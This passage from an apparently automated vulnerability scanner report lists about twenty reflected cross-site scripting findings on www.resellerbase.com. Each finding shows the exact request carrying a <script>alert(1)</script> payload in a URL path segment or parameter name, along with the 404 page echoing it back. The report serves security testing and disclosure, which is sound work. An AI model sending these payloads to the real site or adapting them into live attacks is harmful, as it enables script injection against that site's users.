The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9182e<script>alert(1)</script>8ac9655e9ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/search.php?keyword=search...&Submit3=Search&opt=2&9182e<script>alert(1)</script>8ac9655e9ab=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/search.php?keyword=search...&Submit3=Search&opt=2&9182e<script>alert(1)</script>8ac9655e9ab=1 was not found on this server.</p>
...[SNIP]...

2.1580. http://www.resellerbase.com/detail/19/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/19/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8c2d0<a>b283daee4b6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/search.php?keyword=search...&Submit3=Search&opt=28c2d0<a>b283daee4b6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/search.php?keyword=search...&Submit3=Search&opt=28c2d0<a>b283daee4b6 was not found on this server.</p>
...[SNIP]...

2.1581. http://www.resellerbase.com/detail/19/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d603<script>alert(1)</script>9ab43a9f884 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8d603<script>alert(1)</script>9ab43a9f884/19/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8d603<script>alert(1)</script>9ab43a9f884/19/themes/ was not found on this server.</p>
...[SNIP]...

2.1582. http://www.resellerbase.com/detail/19/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a0f7<script>alert(1)</script>15f5870b9c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/195a0f7<script>alert(1)</script>15f5870b9c3/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/195a0f7<script>alert(1)</script>15f5870b9c3/themes/ was not found on this server.</p>
...[SNIP]...

2.1583. http://www.resellerbase.com/detail/19/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 212a5<script>alert(1)</script>81d21b618cb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes212a5<script>alert(1)</script>81d21b618cb/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes212a5<script>alert(1)</script>81d21b618cb/ was not found on this server.</p>
...[SNIP]...

2.1584. http://www.resellerbase.com/detail/19/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9329c<script>alert(1)</script>994e169f894 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/?9329c<script>alert(1)</script>994e169f894=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/?9329c<script>alert(1)</script>994e169f894=1 was not found on this server.</p>
...[SNIP]...

2.1585. http://www.resellerbase.com/detail/19/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa27b<script>alert(1)</script>eb1eefda010 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailaa27b<script>alert(1)</script>eb1eefda010/19/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailaa27b<script>alert(1)</script>eb1eefda010/19/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1586. http://www.resellerbase.com/detail/19/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb02c<script>alert(1)</script>40c83273e37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19eb02c<script>alert(1)</script>40c83273e37/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19eb02c<script>alert(1)</script>40c83273e37/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1587. http://www.resellerbase.com/detail/19/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 87035<script>alert(1)</script>1485d3aae82 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes87035<script>alert(1)</script>1485d3aae82/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes87035<script>alert(1)</script>1485d3aae82/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1588. http://www.resellerbase.com/detail/19/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f2d9<script>alert(1)</script>6a079f60aea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos6f2d9<script>alert(1)</script>6a079f60aea/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos6f2d9<script>alert(1)</script>6a079f60aea/ was not found on this server.</p>
...[SNIP]...

2.1589. http://www.resellerbase.com/detail/19/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ef645<script>alert(1)</script>e2a4a97ce76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/?ef645<script>alert(1)</script>e2a4a97ce76=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/?ef645<script>alert(1)</script>e2a4a97ce76=1 was not found on this server.</p>
...[SNIP]...

2.1590. http://www.resellerbase.com/detail/19/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 42f61<script>alert(1)</script>311ec053aa7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail42f61<script>alert(1)</script>311ec053aa7/19/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail42f61<script>alert(1)</script>311ec053aa7/19/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1591. http://www.resellerbase.com/detail/19/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ff751<script>alert(1)</script>99552c999a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19ff751<script>alert(1)</script>99552c999a/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19ff751<script>alert(1)</script>99552c999a/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1592. http://www.resellerbase.com/detail/19/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eb840<script>alert(1)</script>12874e16b17 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themeseb840<script>alert(1)</script>12874e16b17/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themeseb840<script>alert(1)</script>12874e16b17/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1593. http://www.resellerbase.com/detail/19/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6e8ce<script>alert(1)</script>5a1e02625ce was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos6e8ce<script>alert(1)</script>5a1e02625ce/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos6e8ce<script>alert(1)</script>5a1e02625ce/images/ was not found on this server.</p>
...[SNIP]...

2.1594. http://www.resellerbase.com/detail/19/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 652ff<script>alert(1)</script>206f6a15795 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images652ff<script>alert(1)</script>206f6a15795/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images652ff<script>alert(1)</script>206f6a15795/ was not found on this server.</p>
...[SNIP]...

2.1595. http://www.resellerbase.com/detail/19/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 45bdf<script>alert(1)</script>1f4486cca85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/?45bdf<script>alert(1)</script>1f4486cca85=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/?45bdf<script>alert(1)</script>1f4486cca85=1 was not found on this server.</p>
...[SNIP]...

2.1596. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17275<script>alert(1)</script>3a6e50aab3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail17275<script>alert(1)</script>3a6e50aab3e/19/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail17275<script>alert(1)</script>3a6e50aab3e/19/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1597. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a03b5<script>alert(1)</script>136766a3df9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19a03b5<script>alert(1)</script>136766a3df9/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19a03b5<script>alert(1)</script>136766a3df9/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1598. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9eccb<script>alert(1)</script>efd424565b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes9eccb<script>alert(1)</script>efd424565b3/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes9eccb<script>alert(1)</script>efd424565b3/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1599. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/

Issue detail

